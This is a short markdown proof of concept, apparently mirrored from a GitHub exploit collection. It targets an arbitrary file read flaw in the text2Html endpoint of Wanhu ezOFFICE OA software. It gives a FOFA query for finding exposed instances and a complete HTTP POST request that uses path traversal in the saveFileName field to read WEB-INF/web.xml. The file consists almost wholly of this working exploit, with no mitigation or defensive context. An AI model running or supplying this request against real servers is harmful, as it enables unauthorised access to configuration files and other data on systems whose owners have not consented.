mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-07-29 14:04:06 +00:00
23 lines
624 B
Markdown
23 lines
624 B
Markdown
![]() |
## 万户OA text2Html接口存在任意文件读取漏洞
|
||
|
|
||
|
## fofa
|
||
|
```
|
||
|
app="万户网络-ezOFFICE"
|
||
|
```
|
||
|
|
||
|
## poc
|
||
|
```
|
||
|
POST /defaultroot/convertFile/text2Html.controller HTTP/1.1
|
||
|
Host:
|
||
|
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
|
||
|
Connection: close
|
||
|
Content-Length: 63
|
||
|
Accept-Encoding: gzip, deflate, br
|
||
|
Content-Type: application/x-www-form-urlencoded
|
||
|
SL-CE-SUID: 1081
|
||
|
|
||
|
saveFileName=123456/../../../../WEB-INF/web.xml&moduleName=html
|
||
|
```
|
||
|
|
||
|

|